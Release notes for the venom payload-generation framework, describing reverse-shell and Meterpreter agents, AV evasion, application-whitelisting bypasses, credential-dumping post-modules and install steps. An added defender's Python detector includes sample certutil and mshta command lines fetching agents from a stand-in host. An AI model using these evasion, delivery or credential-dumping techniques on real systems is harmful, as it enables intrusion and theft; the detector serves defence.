venom v1.0.15 :: Pandora's box (pithos)
Version release: v1.0.15
Author: pedro ubuntu [ r00t-3xp10it ]
Codename: Pandora's box (pithos)
Distros Supported: Linux Ubuntu, Kali, Debian, BackBox, Parrot OS
Suspicious-Shell-Activity© (SSA) RedTeam development @2018
:: Framework Description ::
This tool uses msfvenom (metasploit) to generate shellcode in different formats ( c | python | ruby | dll |
msi | hta-psh | docm | deb | xml | ps1 | bat | exe | elf | macho | etc ), then injects the generated shellcode
into one template (example: python) "the python function will execute the shellcode in RAM" and uses
compilers like gcc (gnu cross compiler), mingw32 or pyinstaller.py to build the executable file. It also
starts a multi-handler to receive the remote connection (shell or meterpreter).
venom also gives you the opportunity to deliver your payloads using the apache2 webserver (LAN networks),
and ships with self-written post-modules that enhance the metasploit framework: linux_hostrecon.rb (host
info gathering), enigma_fileless_uac_bypass.rb (privilege escalation for Microsoft systems, disclosed by
enigma0x3) and the arno0x0x meterpreter loader random bytes stager (improved msf meterpreter loaders).
It also implements recently disclosed 'Application Whitelisting Bypasses' by @subTee,
@enigma0x3, @mattifestation, etc. By using signed Microsoft binaries and injecting code into them,
we effectively cloak our binaries so that they can execute, even under the watchful eye of Device Guard.
[certutil.exe -urlcache module] disclosed by subTee, download/exec a remote binary using one HTA
[MSbuild xml-exec module] disclosed by subTee, abusing M$ signed binaries to achieve RCE
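As an added example from the defender's side (not part of venom or these notes): a small Python detector that flags, in constructed process-creation records, the command-line shapes the two modules above rely on, certutil.exe fetching a URL via -urlcache, MSBuild.exe handed a bare .xml project, and mshta.exe loading a remote HTA. The image paths, command lines and the 192.0.2.10 address are made up for the example.

```python
import re

# Constructed process-creation records (made up for this example, not real telemetry).
# Each pair holds one record matching a venom agent delivery shape and one ordinary use.
EVENTS = [
    {"image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://192.0.2.10/agent.exe C:\\Users\\Public\\agent.exe"},
    {"image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -verify C:\\certs\\server.cer"},
    {"image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "cmdline": "MSBuild.exe C:\\Users\\Public\\shellcode.xml"},
    {"image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "cmdline": "MSBuild.exe C:\\src\\app\\app.sln /p:Configuration=Release"},
    {"image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://192.0.2.10/agent.hta"},
    {"image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe C:\\Program Files\\Vendor\\setup.hta"},
]

URL = re.compile(r"https?://", re.I)


def classify(event):
    """Return the name of the rule an event matches, or None for ordinary use."""
    image = event["image"].rsplit("\\", 1)[-1].lower()
    cmd = event["cmdline"]
    args = cmd.lower()
    # certutil's cache option pulling from a URL is the subTee download/exec shape.
    if image == "certutil.exe" and "-urlcache" in args and URL.search(cmd):
        return "certutil_urlcache_download"
    # A .csproj/.sln build is routine developer activity; MSBuild given a bare
    # .xml project is the inline-task execution shape from the changelog.
    if image == "msbuild.exe" and re.search(r"\.xml\b", args):
        return "msbuild_inline_task_project"
    # mshta loading an HTA over HTTP rather than from disk.
    if image == "mshta.exe" and URL.search(cmd):
        return "mshta_remote_hta"
    return None


def scan(events):
    """Return (index, rule) for every record that matched a rule."""
    return [(i, r) for i, e in enumerate(events) if (r := classify(e))]


if __name__ == "__main__":
    for idx, rule in scan(EVENTS):
        print(idx, rule, EVENTS[idx]["cmdline"])
```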
:: v1.0.15 Changelog ::
New agents added
- @subTee - certutil remote download/execute agent(.bat|.exe)
- @subTee - csharp shellcode.xml (MSbuild.exe - appl_whitelisting_bypass)
- node.js reverse shell added to category: 'system built-in shells'
- unix_exploit (agent.php uploaded/executed in target apache2)
- linux elf agent (x86|x64 bits - doubleclick execution)
- CVE-2017-11882 (Microsoft office word rtf) agent.rft
- SSL CERT connection payloads: 'windows/meterpreter/reverse_winhttps',
  'linux/x86/meterpreter_reverse_https', 'linux/x64/meterpreter_reverse_https'
- IOS devices macho payloads: 'osx/armle/shell_reverse_tcp',
  'apple_ios/aarch64/meterpreter_reverse_tcp', 'osx/x64/meterpreter/reverse_tcp'
New Post-exploitation modules
- linux_hostrecon.rb added to apache2 attack vector
- wifi_dump_linux.rb added to apache2 attack vector
Framework Improvements
- Abort function improved in all module builds
- Framework CLI interface re-designed (terminal displays).
- Detection ratio of all builds reviewed (recent no-distribute url reports)
- x64 arch support added to kimi.py (debian payload generator)
- Executable DLL payload (.cpl) option, added to all dll agents
- uuid (@nullbyte) obfuscation module added to some builds
- arno0x0x meterpreter loader random bytes stager (av evasion)
Framework Bug-fixes
- msf encoders arch bug fixed under venom
- support for x64 AMD chipsets reviewed/bug-fixed
:: v1.0.15 Update Detailed Description ::
The biggest update in version 1.0.15 can be found in its CLI interface, which now provides users with
more intuitive/polished main-menu and sub-menu terminal displays. This new release now groups the
agents by target operating system (Unix, Microsoft, Osx, Android, etc) and displays more
detailed information about each agent, like: target systems, agent execution, agent detection ratio, etc.
:: SSL CERT Connection Payloads ::
venom 1.0.15 ships with 3 new special payloads that allow users to secure their initial staged/stageless
Meterpreter connection by having the agent check the certificate (SSL) of the listener it is connecting to.
- windows/meterpreter/reverse_winhttps (staged)
- linux/x86/meterpreter_reverse_https (stageless)
- linux/x64/meterpreter_reverse_https (stageless)
Every time venom users decide to use these payloads, the agent (client) will authenticate (SHA1)
the connection to the handler (server) using venom's SSL certificate to encrypt the connection.
@OJ - staged-vs-stageless handlers: http://buffered.io/posts/staged-vs-stageless-handlers/
:: Meterpreter Random Bytes Stager ::
Another big update was the implementation of the 'arno0x0x - meterpreter loader random bytes stager'.
This setting forces the venom toolkit, at start, to backup/replace the msf meterpreter_loader.rb (x86) and
its counterpart (x64), rebuild the msf database (msfdb) and reload venom's meterpreter_loaders into msf,
IF the option 'RANDOM_STAGER_BYTES=ON' is active in venom's settings file. These new loaders
add an arbitrary number of random bytes at the beginning of the stage being sent back to the stager,
in an attempt to evade AV signature detection and runtime detection. If the setting is set to OFF,
venom will not copy the new meterpreter loaders to msf and works with the metasploit default ones.
REMARK: This method was not tested yet using https payloads (@Arno0x0x) ..
REMARK: This obfuscation technique can only be used in windows/meterpreter staged payloads,
because the 'obfuscation' requires a stage (dll reflection) being sent back to the agent (client) ..
Staged Payloads Connection Diagram:
- agent (client) is executed in target system
- connects to server (handler) to ask for stage (dll reflection)
- random bytes are added at the beginning of the stage <-- arno0x0x obfuscation method
- stage is sent back to agent (client)
- dll reflection executed in target ram
- meterpreter session opens
Obfuscation Supported Payloads
- windows/meterpreter/reverse_tcp
- windows/meterpreter/reverse_tcp_dns
- windows/meterpreter/reverse_http
- windows/x64/meterpreter/reverse_tcp
- windows/x64/meterpreter/reverse_http
:: Automate Venom's Post-Exploitation Modules ::
This version also allows users to automate venom's post-exploitation modules (resource_files.rc)
"venom triggers the post-exploitation modules by using the apache2 webserver to deliver the agents".
Let's look at the following example: linux_hostrecon.rb in venom runs by default only one system
enumeration module, but the post-module has more advanced options that can be manually set:
- sessions <-- the session number to run the module against
- store_loot <-- allows users to write the session logfile into the .msf4/loot folder
- single_command <-- allows users to execute a remote bash command
- agressive_dump <-- uses aggressive modules to gather more info about the target
- credentials_dump <-- dumps credentials from the target system
- the_fapenning <-- searches the target system for hidden porn related folders/files
Edit /venom/aux/linux_hostrecon.rc and set any of the above described options, save the file, run venom.
run post/linux/gather/linux_hostrecon SINGLE_COMMAND="netstat -atnp | grep ESTABLISHED"
This will trigger linux_hostrecon.rb's default enumeration module and execute the given bash command.
REMARK: All post-exploitation modules can be found under the ../venom/aux folder and they can also
be executed from the meterpreter prompt: meterpreter > resource /root/venom/aux/[resource_name.rc]
REMARK: The new metasploit release has deleted multi_console_command.rb (by darkoperator),
which allowed venom users to auto-run post-exploitation modules at session creation, but venom's
resource files can still be called using: meterpreter > resource /root/venom/aux/[resource_name.rc]
:: Video Tutorials ::
linux_hostrecon(rc|rb) post-module automation (multi-OS - agent.py)
https://www.youtube.com/watch?v=xROot1-NAaI
certutil.exe -urlcache - download/execute a bat|exe remotely (Windows-OS - agent.hta)
PE shellcode cave injection - inject shellcode into legit applications (Windows-OS - agent.exe)
https://www.youtube.com/watch?v=L87YvJTsucE
ELF - inject shellcode into 'Executable and Linkable Format' files (Unix-OS - agent.elf)
https://www.youtube.com/watch?v=D894pMieQcM
:: Git download/install ::
1º - Download framework from github
git clone https://github.com/r00t-3xp10it/venom.git
2º - Set file execution permissions
cd venom
sudo chmod -R +x *.sh
sudo chmod -R +x *.py
3º - Install all dependencies
cd aux
sudo ./setup.sh
4º - Run main tool
sudo ./venom.sh
Special thanks: @Arno0x0x (meterpreter loader random bytes stager)
@subTee @enigma0x3 @carnal0wnage (applications_whitelisting_bypass + uac_bypass)
@H4D3S(SSA) @ChaitanyaHaritash(SSA) <-- 'The guy who commissioned this job to me' 🥇
All the hard work goes to: @HDMoore (metasploit) | @NickHarbour (PEScrambler.exe)
@HarmJ0y (pyherion) | @g0tmi1k @ChrisTuncker @HarmJ0y (ruby template stager.rb)
@cortesi (pyinstaller) | @0Entropy (powershell poc's) | @mgraeber (powershell poc's)
@liviu (encrypt_polarSSL) | @alor&naga (ettercap mitm+dns_spoof ) | @astr0baby (poc's)
@Rel1k (set/unicorn shellcode poc's) | @nullbyte (powershell+shellcode poc's)
:: References ::
https://twitter.com/subtee/status/888122309852016641
http://carnal0wnage.attackresearch.com/2017/08/certutil-for-delivery-of-files.html
https://arno0x0x.wordpress.com/2016/04/13/meterpreter-av-ids-evasion-powershell
https://www.virusbulletin.com/virusbulletin/2016/07/journey-evasion-enters-behavioural-phase/
https://blog.conscioushacker.io/index.php/2017/11/17/application-whitelisting-bypass-mshta-exe/
https://blog.conscioushacker.io/index.php/2017/11/17/application-whitelisting-bypass-msbuild-exe/